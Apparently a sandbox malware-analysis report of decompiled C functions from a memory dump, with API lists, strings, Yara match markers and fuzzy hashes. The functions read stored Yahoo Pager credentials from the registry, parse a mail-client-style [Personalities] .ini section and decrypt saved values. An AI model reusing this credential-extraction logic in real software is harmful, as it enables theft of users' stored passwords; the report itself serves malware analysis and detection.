                                                  				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
                                                  				if(_t19 != 0) {
                                                  					_t9 = E00406B5B(_t19);
                                                  					_push(_t19);
                                                  					L004115D6();
                                                  				}
                                                  				_t20 =  *((intOrPtr*)(_t16 + 0x458));
                                                  				if(_t20 != 0) {
                                                  					_t9 = E00406B5B(_t20);
                                                  					_push(_t20);
                                                  					L004115D6();
                                                  				}
                                                  				_t21 =  *((intOrPtr*)(_t16 + 0x454));
                                                  				if(_t21 != 0) {
                                                  					_t9 = E00406A4E(_t21);
                                                  					_push(_t21);
                                                  					L004115D6();
                                                  				}
                                                  				_t22 =  *((intOrPtr*)(_t16 + 0x450));
                                                  				if(_t22 != 0) {
                                                  					_t9 = E00406A4E(_t22);
                                                  					_push(_t22);
                                                  					L004115D6();
                                                  				}
                                                  				return _t9;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                  • Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
                                                  • Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                  • Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 44%
                                                  			E0040173B(void* __ebx) {
                                                  				struct tagRECT _v20;
                                                  				struct tagPAINTSTRUCT _v84;
                                                  
                                                  				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                  				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                  				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                  				asm("movsd");
                                                  				asm("movsd");
                                                  				asm("movsd");
                                                  				asm("movsd");
                                                  				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                  				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                  • String ID:
                                                  • API String ID: 19018683-0
                                                  • Opcode ID: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                  • Instruction ID: a11a87b208587c0640a8feba78a21dda7633aea5bad1576310b301da0c27fea9
                                                  • Opcode Fuzzy Hash: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                  • Instruction Fuzzy Hash: B6014B72900218FFDF08DFA8DD489FE7BB9FB44301F004469EE11EA194DAB1AA14CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E00411366(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
                                                  				signed int _v8;
                                                  				char _v16;
                                                  				char _v24;
                                                  				char _v116;
                                                  				void _v1156;
                                                  				char _v1164;
                                                  				void _v1171;
                                                  				char _v1172;
                                                  				char _v2188;
                                                  				void _v2195;
                                                  				void _v2196;
                                                  				void _v3251;
                                                  				void _v3252;
                                                  				char _v4020;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t96;
                                                  				char _t105;
                                                  				intOrPtr _t112;
                                                  				void* _t115;
                                                  				signed int _t116;
                                                  				int _t121;
                                                  				signed int* _t122;
                                                  				void* _t124;
                                                  				void* _t125;
                                                  				signed int _t128;
                                                  				signed int* _t129;
                                                  				void* _t132;
                                                  
                                                  				_t116 = __edx;
                                                  				_t105 = 0;
                                                  				_v2196 = 0;
                                                  				memset( &_v2195, 0, 0x3ff);
                                                  				_v3252 = 0;
                                                  				memset( &_v3251, 0, 0x41e);
                                                  				_v1172 = 0;
                                                  				memset( &_v1171, 0, 0x41e);
                                                  				_a8 = E00410E8A(_a8,  &_v2196);
                                                  				_t121 = strlen(_a4);
                                                  				if(_a8 > 8) {
                                                  					_t137 = _t121;
                                                  					if(_t121 > 0) {
                                                  						memcpy( &_v3252, _a4, _t121);
                                                  						memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
                                                  						E0040BC49( &_v116);
                                                  						_t19 = _t121 + 8; // 0x8
                                                  						E0040BC6D(_t19,  &_v116,  &_v3252);
                                                  						_t127 =  &_v116;
                                                  						E0040BD0B(_t121,  &_v116,  &_v1172);
                                                  						_t23 = _t121 + 8; // 0x8
                                                  						memcpy( &_v1156,  &_v3252, _t23);
                                                  						E0040BC49( &_v116);
                                                  						_t27 = _t121 + 0x18; // 0x18
                                                  						E0040BC6D(_t27, _t127,  &_v1172);
                                                  						E0040BD0B(_t121, _t127,  &_v24);
                                                  						E0040535A( &_v4020, _t137,  &_v1164,  &_v24);
                                                  						_t122 = _a12;
                                                  						E004053D6( &_v16,  &_v1172, _t122,  &_v4020);
                                                  						_t112 = _a8;
                                                  						_t128 = 0;
                                                  						if(_t112 >= 0x18) {
                                                  							_t37 = _t112 - 0x18; // -16
                                                  							asm("cdq");
                                                  							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
                                                  						}
                                                  						if(_t128 > _t105) {
                                                  							_a4 =  &_v2188;
                                                  							_t125 = _t122 + 8;
                                                  							_v8 = _t128;
                                                  							do {
                                                  								E004053D6(_a4, _t112, _t125,  &_v4020);
                                                  								_a4 = _a4 + 8;
                                                  								_t125 = _t125 + 8;
                                                  								_t45 =  &_v8;
                                                  								 *_t45 = _v8 - 1;
                                                  								_pop(_t112);
                                                  							} while ( *_t45 != 0);
                                                  							_t112 = _a8;
                                                  						}
                                                  						_t96 = 8 + _t128 * 8;
                                                  						_t50 = _t96 + 8; // 0x8
                                                  						if(_t50 > _t112) {
                                                  							_t51 = _t112 - 8; // 0x0
                                                  							_t96 = _t51;
                                                  						}
                                                  						if(_t96 > _t105) {
                                                  							_t129 = _a12;
                                                  							_t124 =  &_v2188 - _t129;
                                                  							_t115 = _t96;
                                                  							do {
                                                  								 *_t129 =  *_t129 ^  *(_t124 + _t129);
                                                  								_t129 =  &(_t129[0]);
                                                  								_t115 = _t115 - 1;
                                                  							} while (_t115 != 0);
                                                  						}
                                                  						 *((char*)(_t96 + _a12)) = _t105;
                                                  						 *_a16 = 1;
                                                  						_t105 = 1;
                                                  					}
                                                  				}
                                                  				return _t105;
                                                   			}

                                                   Instruction address column (one address per statement of the listing above; the per-line alignment did not survive extraction): 0x00411366 to 0x0041152e.

                                                  APIs
                                                  • memset.MSVCRT ref: 00411387
                                                  • memset.MSVCRT ref: 004113A0
                                                  • memset.MSVCRT ref: 004113B4
                                                    • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                  • strlen.MSVCRT ref: 004113D0
                                                  • memcpy.MSVCRT ref: 004113F5
                                                  • memcpy.MSVCRT ref: 0041140B
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                    • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                  • memcpy.MSVCRT ref: 0041144B
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpymemset$strlen
                                                  • String ID:
                                                  • API String ID: 2142929671-0
                                                  • Opcode ID: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                  • Instruction ID: c39f5f8930626063bf72b6da9320efac153577eb3bd573588316f9f93fa8d4dc
                                                  • Opcode Fuzzy Hash: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                  • Instruction Fuzzy Hash: C4515C7290011DABCB10EF55CC819EEB7A9BF44308F5445BAE609A7151EB34AB898F94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 36%
                                                  			E004078FF(signed short __ebx) {
                                                  				signed int _t17;
                                                  				void* _t18;
                                                  				intOrPtr _t23;
                                                  				void* _t31;
                                                  				signed short _t39;
                                                  				signed int _t40;
                                                  				void* _t51;
                                                  				int _t56;
                                                  				void* _t57;
                                                  				int _t67;
                                                  
                                                  				_t39 = __ebx;
                                                  				if( *0x417540 == 0) {
                                                  					E0040787D();
                                                  				}
                                                  				_t40 =  *0x417538;
                                                  				_t17 = 0;
                                                  				if(_t40 <= 0) {
                                                  					L5:
                                                  					_t51 = 0;
                                                  				} else {
                                                  					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
                                                  						_t17 = _t17 + 1;
                                                  						if(_t17 < _t40) {
                                                  							continue;
                                                  						} else {
                                                  							goto L5;
                                                  						}
                                                  						goto L6;
                                                  					}
                                                  					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
                                                  				}
                                                  				L6:
                                                  				if(_t51 != 0) {
                                                  					L22:
                                                  					_t18 = _t51;
                                                  				} else {
                                                  					if((_t39 & 0x00010000) == 0) {
                                                  						if( *0x4171b8 == 0) {
                                                  							_push( *0x417548 - 1);
                                                  							_push( *0x41752c);
                                                  							_push(_t39);
                                                  							_push(E00407A55());
                                                  							goto L16;
                                                  						} else {
                                                  							strcpy(0x4172c0, "strings");
                                                  							_t31 = E00407D89(_t39,  *0x41752c);
                                                  							_t57 = _t57 + 0x10;
                                                  							if(_t31 == 0) {
                                                  								L14:
                                                  								_push( *0x417548 - 1);
                                                  								_push( *0x41752c);
                                                  								_push(_t39);
                                                  								goto L9;
                                                  							} else {
                                                  								_t56 = strlen( *0x41752c);
                                                  								if(_t56 == 0) {
                                                  									goto L14;
                                                  								}
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_push( *0x417548 - 1);
                                                  						_push( *0x41752c);
                                                  						_push(_t39 & 0x0000ffff);
                                                  						L9:
                                                  						_push( *0x416b94);
                                                  						L16:
                                                  						_t56 = LoadStringA();
                                                  						_t67 = _t56;
                                                  					}
                                                  					if(_t67 <= 0) {
                                                  						L21:
                                                  						_t18 = 0x412466;
                                                  					} else {
                                                  						_t23 =  *0x41753c;
                                                  						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
                                                  							goto L21;
                                                  						} else {
                                                  							_t51 = _t23 +  *0x417528;
                                                  							_t10 = _t56 + 1; // 0x1
                                                  							memcpy(_t51,  *0x41752c, _t10);
                                                  							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
                                                  							 *( *0x417530 +  *0x417538 * 4) = _t39;
                                                  							 *0x417538 =  *0x417538 + 1;
                                                  							 *0x41753c =  *0x41753c + _t56 + 1;
                                                  							if(_t51 != 0) {
                                                  								goto L22;
                                                  							} else {
                                                  								goto L21;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t18;
                                                   			}

                                                   Instruction address column (one address per statement of the listing above; the per-line alignment did not survive extraction): 0x004078ff to 0x00407a54.

                                                  APIs
                                                  • strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                    • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
                                                  • strlen.MSVCRT ref: 00407998
                                                  • LoadStringA.USER32 ref: 004079C8
                                                  • memcpy.MSVCRT ref: 00407A07
                                                    • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
                                                    • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
                                                    • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
                                                    • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                  • String ID: strings
                                                  • API String ID: 1748916193-3030018805
                                                  • Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                  • Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
                                                  • Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                  • Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040329E(void* __fp0, intOrPtr _a4) {
                                                  				int _v8;
                                                  				char _v12;
                                                  				char _v13;
                                                  				char _v14;
                                                  				char _v15;
                                                  				void _v1035;
                                                  				char _v1036;
                                                  				char _v1968;
                                                  				char _v2900;
                                                  				void* __esi;
                                                  				void* _t23;
                                                  				int _t30;
                                                  				char* _t31;
                                                  				CHAR* _t49;
                                                  				void* _t50;
                                                  				void* _t55;
                                                  
                                                  				_t62 = __fp0;
                                                   				_t49 = _a4 + 0xd2a; // path of the .ini file, kept at +0xd2a in the caller's context; passed below as lpFileName
                                                   				if( *_t49 != 0) { // nothing to read if no file path was recorded
                                                   					_t52 =  &_v1968;
                                                   					E004021D8( &_v1968);
                                                   					if(E0040314D(_t52, _t49, 0) != 0) { // first call uses name 0; the calls in the loop below pass the text after '='
                                                   						E00402407(_t52, __fp0, _a4);
                                                   					}
                                                   					_v1036 = 0;
                                                   					memset( &_v1035, 0, 0x400); // 0x400 zero bytes, so the 0x3fe-byte section buffer always ends in NULs
                                                   					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49); // whole [Personalities] section as NUL-separated "key=value" strings
                                                   					if(_t30 <= 0) {
                                                   						L11:
                                                   						return _t30;
                                                   					} else {
                                                   						_v12 = 0;
                                                   						_v13 = 0;
                                                   						_v14 = 0;
                                                   						_v15 = 0;
                                                   						_t50 = 0; // running byte offset into the section buffer
                                                   						_t31 =  &_v1036;
                                                   						while(1) {
                                                   							_t30 = strlen(_t31);
                                                   							_v8 = _t30;
                                                   							if(_t30 <= 0) { // an empty string terminates the section list
                                                   								goto L11;
                                                   							}
                                                   							_t54 =  &_v2900;
                                                   							E004021D8( &_v2900);
                                                   							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) { // 0x3d is '='; only "key=value" entries are used, and the text after '=' (_t34 + 1) names what is read next
                                                   								E00402407(_t54, _t62, _a4);
                                                   							}
                                                   							_t30 = _v8;
                                                   							_t50 = _t50 + _t30 + 1; // step over the entry and its NUL
                                                   							if(_t50 >= 0x3ff) { // never walk past the 0x3fe-byte buffer
                                                   								goto L11;
                                                   							} else {
                                                   								_t31 = _t55 + _t50 - 0x408; // next entry in the section buffer (the decompiler writes the address frame-relative)
                                                   								continue;
                                                   							}
                                                  								continue;
                                                  							}
                                                  						}
                                                  						goto L11;
                                                  					}
                                                  				}
                                                  				return _t23;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
                                                  • memset.MSVCRT ref: 004032F2
                                                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 0040330C
                                                  • strchr.MSVCRT ref: 00403341
                                                    • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
                                                  • strlen.MSVCRT ref: 00403383
                                                    • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                  • String ID: Personalities
                                                  • API String ID: 2103853322-4287407858
                                                  • Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                  • Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
                                                  • Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                  • Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00410F79(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                  				void* _v8;
                                                  				void _v1031;
                                                  				char _v1032;
                                                  				void* __esi;
                                                  				void* _t25;
                                                  				int _t26;
                                                  
                                                  				_t25 = __ecx;
                                                  				_t26 = 0;
                                                  				_v1032 = 0;
                                                  				memset( &_v1031, 0, 0x3ff);
                                                  				if(E0040EB3F(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
                                                  					if(E0040EB80(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040EB80(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
                                                  						_t26 = E004112A1(_t25, _a8, _a4,  &_v1032);
                                                  					}
                                                  					RegCloseKey(_v8);
                                                  				}
                                                  				return _t26;
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 00410F9B
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                    • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValuememset
                                                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                  • API String ID: 1830152886-1703613266
                                                  • Opcode ID: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                  • Instruction ID: 4a1c6cf285358ebc60a306e6e4607d202acce7e44454db846991f846a9516d87
                                                  • Opcode Fuzzy Hash: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                  • Instruction Fuzzy Hash: 820184B5A00118BBDB10A6569D02FDE7A6C9B94399F004076FF08F2251E2389F95C698
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405F41(long __eax, struct HWND__* _a4) {
                                                  				char _v1028;
                                                  				char _v2052;
                                                  				void* __edi;
                                                  				long _t15;
                                                  
                                                  				_t15 = __eax;
                                                  				if(__eax == 0) {
                                                  					_t15 = GetLastError();
                                                  				}
                                                  				E00405E46(_t15,  &_v1028);
                                                  				sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
                                                  				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastMessagesprintf
                                                  • String ID: Error$Error %d: %s
                                                  • API String ID: 1670431679-1552265934
                                                  • Opcode ID: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                  • Instruction ID: dfdfd8ae3da356d4892d02c8fdfc7d0b76dc1d64d686e07e92b09a376f71314b
                                                  • Opcode Fuzzy Hash: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                  • Instruction Fuzzy Hash: 9BF0A7B640010876CB10A764DC05FDA76BCAB44704F1440B6BA05E2141EAB4DB458FAC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E0040F037(intOrPtr _a4) {
                                                  				_Unknown_base(*)()* _t3;
                                                  				void* _t7;
                                                  				struct HINSTANCE__* _t8;
                                                  
                                                  				_t7 = 0;
                                                  				_t8 = LoadLibraryA("shlwapi.dll");
                                                  				_t3 = GetProcAddress(_t8, "SHAutoComplete");
                                                  				if(_t3 != 0) {
                                                  					_t7 =  *_t3(_a4, 0x10000001);
                                                  				}
                                                  				FreeLibrary(_t8);
                                                  				return _t7;
                                                  			}

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,774148C0,00405C41,00000000), ref: 0040F040
                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
                                                  • FreeLibrary.KERNEL32(00000000), ref: 0040F066
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                  • API String ID: 145871493-1506664499
                                                  • Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                  • Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
                                                  • Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                  • Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
                                                  				signed int _v8;
                                                  				int _v12;
                                                  				char* _v16;
                                                  				char _v20;
                                                  				signed int* _v24;
                                                  				char _v28;
                                                  				void _v284;
                                                  				char _v540;
                                                  				char _v1068;
                                                  				void _v3115;
                                                  				char _v3116;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t35;
                                                  				signed int _t36;
                                                  				signed int _t40;
                                                  				signed int* _t61;
                                                  				char _t69;
                                                  				char* _t74;
                                                  				char* _t75;
                                                  				intOrPtr* _t76;
                                                  				signed int _t78;
                                                  				int _t80;
                                                  				void* _t83;
                                                  				void* _t84;
                                                  				signed int _t89;
                                                  
                                                  				_t74 = __eax;
                                                  				_t35 = strlen(__eax);
                                                  				_t78 = _t35;
                                                  				_t36 = _t35 & 0x80000001;
                                                  				if(_t36 < 0) {
                                                  					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
                                                  					_t89 = _t36;
                                                  				}
                                                  				if(_t89 != 0 || _t78 <= 0x20) {
                                                  					return _t36;
                                                  				} else {
                                                  					_v3116 = 0;
                                                  					memset( &_v3115, 0, 0x7ff);
                                                  					_v8 = _v8 & 0x00000000;
                                                  					_t61 = _a4 + 4;
                                                  					_t40 =  *_t61 | 0x00000001;
                                                  					if(_t78 <= 4) {
                                                  						L7:
                                                  						_t79 =  &_v1068;
                                                  						E004046D7( &_v1068);
                                                  						if(E004047A0( &_v1068, _t93) != 0) {
                                                  							_v20 = _v8;
                                                  							_v16 =  &_v3116;
                                                  							_v28 = 0x10;
                                                  							_v24 = _t61;
                                                  							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
                                                  								_t80 = _v12;
                                                  								if(_t80 > 0xff) {
                                                  									_t80 = 0xff;
                                                  								}
                                                  								_v540 = 0;
                                                  								_v284 = 0;
                                                  								memcpy( &_v284, _v8, _t80);
                                                  								_t27 =  &_a8; // 0x407626
                                                  								_t75 =  &_v540;
                                                  								 *((char*)(_t84 + _t80 - 0x118)) = 0;
                                                  								E004060D0(0xff, _t75,  *_t27);
                                                  								 *((intOrPtr*)( *_a4))(_t75);
                                                  								LocalFree(_v8);
                                                  							}
                                                  						}
                                                  						return E004047F1( &_v1068);
                                                  					}
                                                  					_t76 = _t74 + 5;
                                                  					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
                                                  					do {
                                                  						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
                                                  						_t40 = _t40 * 0x10ff5;
                                                  						_t76 = _t76 + 2;
                                                  						_v8 = _v8 + 1;
                                                  						_t83 = _t83 - 1;
                                                  						_t93 = _t83;
                                                  						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
                                                  					} while (_t83 != 0);
                                                  					goto L7;
                                                  				}
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeLocalmemcpymemsetstrlen
                                                  • String ID: &v@
                                                  • API String ID: 3110682361-3426253984
                                                  • Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                  • Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
                                                  • Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                  • Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                  				void _v259;
                                                  				char _v260;
                                                  				signed int _t34;
                                                  				char* _t45;
                                                  				void* _t47;
                                                  
                                                  				E00405EFD(_a4, "<item>\r\n");
                                                  				_t34 = 0;
                                                  				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
                                                  					do {
                                                  						_v260 = 0;
                                                  						memset( &_v259, 0, 0xfe);
                                                  						E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
                                                  						_t45 =  &_v260;
                                                  						E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
                                                  						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
                                                  						E00405EFD(_a4,  *(__edi + 0x54));
                                                  						_t47 = _t47 + 0x28;
                                                  						_t34 = _t34 + 1;
                                                  					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
                                                  				}
                                                  				return E00405EFD(_a4, "</item>\r\n");
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                  • memset.MSVCRT ref: 004096CB
                                                    • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                    • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                    • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                  • sprintf.MSVCRT ref: 00409710
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                  • API String ID: 3200591283-2769808009
